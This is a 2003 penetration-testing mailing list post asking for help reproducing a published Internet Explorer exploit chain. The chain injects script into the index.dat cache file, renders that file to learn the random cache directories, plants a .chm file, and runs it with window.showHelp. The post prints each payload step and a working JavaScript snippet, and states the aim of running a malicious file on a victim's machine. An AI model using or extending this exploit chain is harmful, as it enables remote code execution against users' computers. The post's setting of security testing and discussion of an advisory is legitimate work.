Penetration Testing mailing list archives
Testing Cross-Site Scripting to Inject and run malicious code
From: Indian Tiger <indiantiger () mailandnews com>
Date: Sat, 12 Apr 2003 11:41:45 -0400
HI All, I am testing Cross-Site Scripting to Inject and run malicious code. I was following Georgi Guninskis Advisory, which was published on Date: 23 November 2000. Following this advisory, I am trying to inject some malicious file at victims machine & then to run that injected file. According to this advisory we have to perform following four steps to Inject some file & Run that file. 1) inject JavaScript in Index.dat by window.open("http://somehost/index.html?<SCRIPT>JSCODE</SCRIPT>") The JavaScript is executed in index.dat and has access to its content, which allow to find the random directory names 2) parse/render index.dat by: <OBJECT DATA="file://C:/WINDOWS/Temporary Internet Files/Content.IE5/index.dat" TYPE="text/html" WIDTH=200 HEIGHT=200></OBJECT> 3) After the Temporary internet Files Folders are known inject for example chm files by: <OBJECT DATA="chm1.chm" TYPE="text/html"></OBJECT> 4) Do window.showHelp("FOUNDRANDOMDIRECTORY\\chm1[1].chm"); I am clear up to the second step he has specified, but I am not clear with the third and fourth stage. The third stage is going to inject chm1.chm file at the victims machine, but it is not clear whether this file is situated at victims machine or attackers machine? Also where this file will be stored at victims machine? This step also doesnt use the name of random directories we have found in the 2nd step so I dont know why the second step is required & how we can write Java script to find random folders from the Index.dat file? The code for injecting Java Script into Index.dat & displaying content of the index.dat file is given as: <SCRIPT> b=window.open("http://10.10.10.10?<SCRIPT>a=window.open();a.document.body.inne rHTML=escape(document.body.innerHTML)</"+"SCRIPT>"); s='<OBJECT DATA="file://C:/WINDOWS/Temporary Internet Files/Content.IE5/index.dat" TYPE="text/html" WIDTH=200 HEIGHT=200></OBJECT>'; setTimeout("document.writeln(s)",10000); </SCRIPT> This code should return output of file index.dat in to new blank window but when I tried this I didnt get output of index.dat file into new window, instead I got output of index.dat in the same window in which I had written this code. I think to run Java Script, stored into index.dat file, first there is need to create a object that captures all the contents of the index.dat file and then we should create a new window & assign its Inner HTML Code to the contents of the object created. I dont know whether it make sense or not. But I am trying to do something like that. Any Help on the above topics will be highly appreciated. Thanking You, Sincerely, Indian Tiger, CISSP -------------------------------------------------------------- Costs are climbing and complaints are rising as SPAM overloads your e-mail servers and Inboxes SurfControl E-mail Filter puts the brakes on spam & viruses and gives you the reports to prove it. http://www.securityfocus.com/SurfControl-pen-test2 Download a free trial and see just what's going in and out of your organization. --------------------------------------------------------------
Current thread:
- Testing Cross-Site Scripting to Inject and run malicious code Indian Tiger (Apr 12)